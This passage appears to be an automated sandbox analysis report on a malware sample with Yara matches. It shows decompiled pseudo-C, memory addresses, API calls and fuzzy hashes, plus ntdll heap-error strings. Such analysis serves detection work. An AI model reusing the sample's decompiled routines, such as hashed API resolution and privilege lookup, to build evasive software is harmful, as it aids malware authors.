						__eax = E0041A500(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L13:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L17;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L13;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L13;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E0041BDE0(_a12,  &_v688, 0x2a8);
										L17:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E0041A490(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *((intOrPtr*)(_a12 + 0x14)) = _v668;
											__edx =  *((intOrPtr*)(__esi + 0x2d0));
											_t36 = __esi + 0x2e8; // 0x2e8
											__eax = _t36;
											 *_t36 = _v136;
											__eax = _a12;
											_t38 = __esi + 0x314; // 0x314
											__ebx = _t38;
											__ecx = 0;
											__eax = _a12 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E00419D10(__edi, _a12 + 0x220,  *((intOrPtr*)(__esi + 0x2d0)), __ebx, _a12 + 0x220);
											__ecx = 0;
											 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t46 = __esi + 0x2e0; // 0x2e0
												__eax = _t46;
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												_a12 = _a12 + 0x224;
												 *((intOrPtr*)(__esi + 0x2e4)) = _v132;
												 *__ebx = 0x18;
												 *((intOrPtr*)(__esi + 0x2d0)) = 0x1a;
												__eax = E00419D50(__edi, _a12 + 0x224, 0x1a, __ebx, _t46);
												 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
													__eflags =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
													__eax = E0041B3F0(__ecx);
													__ebx = __eax;
													__eax =  *((intOrPtr*)(__ebx + 0x28));
													__eax = E0041C0D0(__ebx, __edi,  *((intOrPtr*)(__ebx + 0x28)));
													__edx =  *((intOrPtr*)(__ebx + 0x28));
													_t61 = __eax + 2; // 0x2
													__ecx = __eax + _t61;
													__eax =  &_v656;
													__eax = E00414A50(__edi,  &_v656, 2, 0); // executed
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
												}
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						goto L21;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L21:
			}
























                      0x00408393
                      0x00408393
                      0x00408395
                      0x00408327
                      0x0040832d
                      0x0040832e
                      0x0040833e
                      0x0040834e
                      0x00408353
                      0x0040835a
                      0x0040835c
                      0x0040835d
                      0x0040836a
                      0x0040836c
                      0x0040836e
                      0x0040838b
                      0x0040838b
                      0x0040838d
                      0x00408392
                      0x00408397
                      0x00408397
                      0x00408399
                      0x0040839a
                      0x0040839b
                      0x0040839d
                      0x004083a0
                      0x004083a1
                      0x004083a3
                      0x004083a9
                      0x004083aa
                      0x004083ab
                      0x004083ac
                      0x004083b4
                      0x004083b7
                      0x004083c4
                      0x004083c9
                      0x004083cc
                      0x004083d2
                      0x004083d5
                      0x004083d6
                      0x004083d7
                      0x004083dc
                      0x004083df
                      0x004083ea
                      0x004083ea
                      0x004083f1
                      0x00408400
                      0x00408406
                      0x0040840b
                      0x00408418
                      0x00408422
                      0x0040842a
                      0x00408430
                      0x00408432
                      0x00000000
                      0x00000000
                      0x00408434
                      0x0040843c
                      0x00408456
                      0x00408456
                      0x00408459
                      0x0040845a
                      0x0040845d
                      0x00408460
                      0x00000000
                      0x00408462
                      0x00408462
                      0x00000000
                      0x00408462
                      0x0040843e
                      0x0040843e
                      0x00408445
                      0x00000000
                      0x00408447
                      0x00408447
                      0x0040844e
                      0x00000000
                      0x00408450
                      0x00408450
                      0x00408454
                      0x00408470
                      0x00408478
                      0x00408480
                      0x00408485
                      0x0040848d
                      0x0040848d
                      0x00408495
                      0x0040849d
                      0x0040849f
                      0x00000000
                      0x004084a1
                      0x004084a1
                      0x004084a7
                      0x004084aa
                      0x004084b0
                      0x004084b3
                      0x004084b9
                      0x004084b9
                      0x004084c0
                      0x004084c2
                      0x004084c5
                      0x004084c5
                      0x004084cc
                      0x004084cf
                      0x004084d6
                      0x004084dc
                      0x004084e2
                      0x004084e8
                      0x004084ee
                      0x004084f4
                      0x004084fa
                      0x004084ff
                      0x00408504
                      0x0040850a
                      0x0040850c
                      0x00000000
                      0x00408512
                      0x00408512
                      0x00408515
                      0x00408515
                      0x0040851c
                      0x00408522
                      0x00408528
                      0x0040852e
                      0x00408534
                      0x00408540
                      0x00408548
                      0x0040854e
                      0x00408554
                      0x0040855e
                      0x00408566
                      0x0040856c
                      0x0040856e
                      0x00000000
                      0x00408574
                      0x00408574
                      0x0040857a
                      0x0040857a
                      0x00408580
                      0x0040858d
                      0x0040858f
                      0x00408593
                      0x00408598
                      0x0040859b
                      0x0040859b
                      0x004085ab
                      0x004085b3
                      0x004085bb
                      0x004085bc
                      0x004085bd
                      0x004085be
                      0x004085c0
                      0x004085c1
                      0x004085c1
                      0x0040856e
                      0x0040850c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00408454
                      0x0040844e
                      0x00408445
                      0x00000000
                      0x0040843c
                      0x00408467
                      0x00408468
                      0x00408469
                      0x00408469
                      0x0040846b
                      0x0040846c
                      0x0040846e
                      0x0040846f
                      0x0040846f
                      0x00000000

                      APIs
                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID:
                      • API String ID: 1836367815-0
                      • Opcode ID: baa8ae118fd22a3153c90dcb406bd10fe779d413d12e79746b8f4738688529c4
                      • Instruction ID: 86184a6a890d39a2673d1e5455a39505da8b074ab68cf1d561a334bc6575543b
                      • Opcode Fuzzy Hash: baa8ae118fd22a3153c90dcb406bd10fe779d413d12e79746b8f4738688529c4
                      • Instruction Fuzzy Hash: 6961E870900309AFDB24DF64DD85FEB77B8EF48704F00456EF949A7281EB7869418BA9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00408310, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 57%
                      			E00408310(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, long _a8, intOrPtr _a57327689) {
				char _v67;
				char _v68;
				void* _t13;
				intOrPtr* _t14;
				int _t15;
				void* _t19;
				long _t23;
				intOrPtr* _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_t19 = __ecx;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				_a57327689 = _a57327689 + _t19;
				_push(_t19);
				E0041CA00();
				_t13 = E0040ACF0(__ebx, __edi, _t32, _a4 + 0x1c,  &_v68); // executed
				_t14 = E00414E50(_a4 + 0x1c, _t13, 0, 0, 0xc4e7b6d6);
				_t27 = _t14;
				if(_t27 != 0) {
					_push(__edi);
					_t23 = _a8;
					_t15 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t34 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t27(_t23, 0x8003, _t28 + (E0040A480(_t34, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
					return _t15;
				}
				return _t14;
			}













                      0x00408310
                      0x00408310
                      0x0040831f
                      0x00408323
                      0x00408327
                      0x0040832d
                      0x0040832e
                      0x0040833e
                      0x0040834e
                      0x00408353
                      0x0040835a
                      0x0040835c
                      0x0040835d
                      0x0040836a
                      0x0040836c
                      0x0040836e
                      0x0040838b
                      0x0040838b
                      0x00000000
                      0x0040838d
                      0x00408392

                      APIs
                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID:
                      • API String ID: 1836367815-0
                      • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                      • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                      • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                      • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A662, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 75%
                      			E0041A662(void* __eax, signed int __edi, signed int* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t14;

				 *__esi =  *__esi & __edi;
				_t10 = __eax + 0x18cae608;
				asm("in eax, dx");
				 *(_t10 - 0x74aa68bb) =  *(__eax + 0x18cae608 - 0x74aa68bb) & _t10;
				_t11 = _a4;
				_push(__esi);
				_t5 = _t11 + 0xc74; // 0xc74
				E0041AF60(__edi, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t14;
			}




                      0x0041a664
                      0x0041a666
                      0x0041a66b
                      0x0041a66c
                      0x0041a673
                      0x0041a679
                      0x0041a67f
                      0x0041a687
                      0x0041a69d
                      0x0041a6a1

                      APIs
                      • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: a748f2305e32daf78277a89d9a54a73d4fb5ea3d84165c2add061470d84732b3
                      • Instruction ID: b8837207b3f833786c1b56338df5056352b17a690e064bc72cb588fc55eff48a
                      • Opcode Fuzzy Hash: a748f2305e32daf78277a89d9a54a73d4fb5ea3d84165c2add061470d84732b3
                      • Instruction Fuzzy Hash: C6F0EDB2204215AFD714DFA9CC48EEB37ACEF88314F158559F88897241C630E901CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A670, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                      0x0041a67f
                      0x0041a687
                      0x0041a69d
                      0x0041a6a1

                      APIs
                      • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                      • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                      • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                      0x0041a7ea
                      0x0041a800
                      0x0041a804

                      APIs
                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: LookupPrivilegeValue
                      • String ID:
                      • API String ID: 3899507212-0
                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                      • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                      • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A6A4, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                      Download Yara Rule
                      C-Code - Quality: 30%
                      			E0041A6A4() {
				int _v4;
				intOrPtr _v8;
				signed char _t5;
				signed int* _t10;
				void* _t14;

				asm("stc");
				_push(_t5);
				asm("ror byte [edx], 0x4a");
				asm("pushad");
				 *_t10 =  *_t10 | _t5;
				_t7 = _v8;
				_push(_t15);
				E0041AF60(_t14, _v8, _v8 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
				ExitProcess(_v4);
			}








                      0x0041a6a4
                      0x0041a6a7
                      0x0041a6a8
                      0x0041a6ab
                      0x0041a6ac
                      0x0041a6b3
                      0x0041a6bc
                      0x0041a6ca
                      0x0041a6d8

                      APIs
                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: aaf9148e798418c69448c005fec4a4e8fbc40a300ddfeab8d3f4dedd6eb22ea4
                      • Instruction ID: 72afbe6f227dcb582e2e2f1cbc77fcdcecef110db7c557eeae952ed980803967
                      • Opcode Fuzzy Hash: aaf9148e798418c69448c005fec4a4e8fbc40a300ddfeab8d3f4dedd6eb22ea4
                      • Instruction Fuzzy Hash: 1CE04FB16012147BD7218B69CD88FD33FA8DF8A764F048099B54D6F246D274A500C7A2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A6B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0041A6B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                      0x0041a6b3
                      0x0041a6ca
                      0x0041a6d8

                      APIs
                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                      • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                      • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0166967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 62788ee0f85626fa7ea6af96358dc6e5d2e66addf6def06f7a2292ef831ed2be
                      • Instruction ID: bb9560fde6d34c67ef3b647cdf3193900f81a6514fb9c13ef31c866d6f41cf1e
                      • Opcode Fuzzy Hash: 62788ee0f85626fa7ea6af96358dc6e5d2e66addf6def06f7a2292ef831ed2be
                      • Instruction Fuzzy Hash: A1B02B718010C0C9F601D7A00F087173A047BC0300F12C011D1020240B4338C080F1B1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 016DB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                      Download Yara Rule
                      Strings
                      • The instruction at %p referenced memory at %p., xrefs: 016DB432
                      • The resource is owned exclusively by thread %p, xrefs: 016DB374
                      • an invalid address, %p, xrefs: 016DB4CF
                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 016DB314
                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 016DB47D
                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 016DB39B
                      • The critical section is owned by thread %p., xrefs: 016DB3B9
                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 016DB323
                      • Go determine why that thread has not released the critical section., xrefs: 016DB3C5
                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 016DB2DC
                      • *** Inpage error in %ws:%s, xrefs: 016DB418
                      • read from, xrefs: 016DB4AD, 016DB4B2
                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 016DB2F3
                      • The instruction at %p tried to %s , xrefs: 016DB4B6
                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 016DB3D6
                      • The resource is owned shared by %d threads, xrefs: 016DB37E
                      • a NULL pointer, xrefs: 016DB4E0
                      • *** Resource timeout (%p) in %ws:%s, xrefs: 016DB352
                      • This failed because of error %Ix., xrefs: 016DB446
                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 016DB305
                      • *** An Access Violation occurred in %ws:%s, xrefs: 016DB48F
                      • *** enter .cxr %p for the context, xrefs: 016DB50D
                      • <unknown>, xrefs: 016DB27E, 016DB2D1, 016DB350, 016DB399, 016DB417, 016DB48E
                      • write to, xrefs: 016DB4A6
                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 016DB476
                      • *** enter .exr %p for the exception record, xrefs: 016DB4F1
                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 016DB484
                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 016DB53F
                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 016DB38F
                      • *** then kb to get the faulting stack, xrefs: 016DB51C
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                      • API String ID: 0-108210295
                      • Opcode ID: 406f41d13c2e43279519eabac01722cc20c941e8b78aa73e548e3a3c4f070e23
                      • Instruction ID: 8cb526e7211507becbfeaa21dcd7bf8c743417aa3a3fbf9616589fcdfd72e335
                      • Opcode Fuzzy Hash: 406f41d13c2e43279519eabac01722cc20c941e8b78aa73e548e3a3c4f070e23
                      • Instruction Fuzzy Hash: D3814335E00210FFDB229E4A8C89DBF3F26AF57A51F4A405CF5065B21ED3628552DBB2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016E1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                      Download Yara Rule
                      C-Code - Quality: 44%
                      			E016E1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x16048a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0162B150();
				} else {
					E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x171589c);
				E0162B150("Heap error detected at %p (heap handle %p)\n",  *0x17158a0);
				_t27 =  *0x1715898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M016E1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0162B150();
				} else {
					E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0162B150("Error code: %d - %s\n",  *0x1715898);
				_t113 =  *0x17158a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0162B150();
					} else {
						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0162B150("Parameter1: %p\n",  *0x17158a4);
				}
				_t115 =  *0x17158a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0162B150();
					} else {
						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0162B150("Parameter2: %p\n",  *0x17158a8);
				}
				_t117 =  *0x17158ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0162B150();
					} else {
						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0162B150("Parameter3: %p\n",  *0x17158ac);
				}
				_t119 =  *0x17158b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0162B150();
					} else {
						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x17158b4);
					E0162B150("Last known valid blocks: before - %p, after - %p\n",  *0x17158b0);
				} else {
					_t120 =  *0x17158b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0162B150();
				} else {
					E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0162B150("Stack trace available at %p\n", 0x17158c0);
			}











                      0x016e1c10
                      0x016e1c16
                      0x016e1c1e
                      0x016e1c3d
                      0x016e1c3e
                      0x016e1c20
                      0x016e1c35
                      0x016e1c3a
                      0x016e1c44
                      0x016e1c55
                      0x016e1c5a
                      0x016e1c65
                      0x016e1c67
                      0x00000000
                      0x016e1c6e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x016e1c67
                      0x016e1cdc
                      0x016e1ce5
                      0x016e1d04
                      0x016e1d05
                      0x016e1ce7
                      0x016e1cfc
                      0x016e1d01
                      0x016e1d0b
                      0x016e1d17
                      0x016e1d1f
                      0x016e1d25
                      0x016e1d30
                      0x016e1d4f
                      0x016e1d50
                      0x016e1d32
                      0x016e1d47
                      0x016e1d4c
                      0x016e1d61
                      0x016e1d67
                      0x016e1d68
                      0x016e1d6e
                      0x016e1d79
                      0x016e1d98
                      0x016e1d99
                      0x016e1d7b
                      0x016e1d90
                      0x016e1d95
                      0x016e1daa
                      0x016e1db0
                      0x016e1db1
                      0x016e1db7
                      0x016e1dc2
                      0x016e1de1
                      0x016e1de2
                      0x016e1dc4
                      0x016e1dd9
                      0x016e1dde
                      0x016e1df3
                      0x016e1df9
                      0x016e1dfa
                      0x016e1e00
                      0x016e1e0a
                      0x016e1e13
                      0x016e1e32
                      0x016e1e33
                      0x016e1e15
                      0x016e1e2a
                      0x016e1e2f
                      0x016e1e39
                      0x016e1e4a
                      0x016e1e02
                      0x016e1e02
                      0x016e1e08
                      0x00000000
                      0x00000000
                      0x016e1e08
                      0x016e1e5b
                      0x016e1e7a
                      0x016e1e7b
                      0x016e1e5d
                      0x016e1e72
                      0x016e1e77
                      0x016e1e95

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                      • API String ID: 0-2897834094
                      • Opcode ID: 55b39cd9c9ef846abe801d19d60f565cd365e906641be0297e0970aa5bd4c4e1
                      • Instruction ID: 0f0c4406279c90ae81d873b17d80fed868cbc8abc9dd52ddac2c303a71fecc6c
                      • Opcode Fuzzy Hash: 55b39cd9c9ef846abe801d19d60f565cd365e906641be0297e0970aa5bd4c4e1
                      • Instruction Fuzzy Hash: A761F433592551CFD316AB89DC8CE2173E5EB06E31B5D812EFC0A9B341D63698919F0D
                      Uniqueness

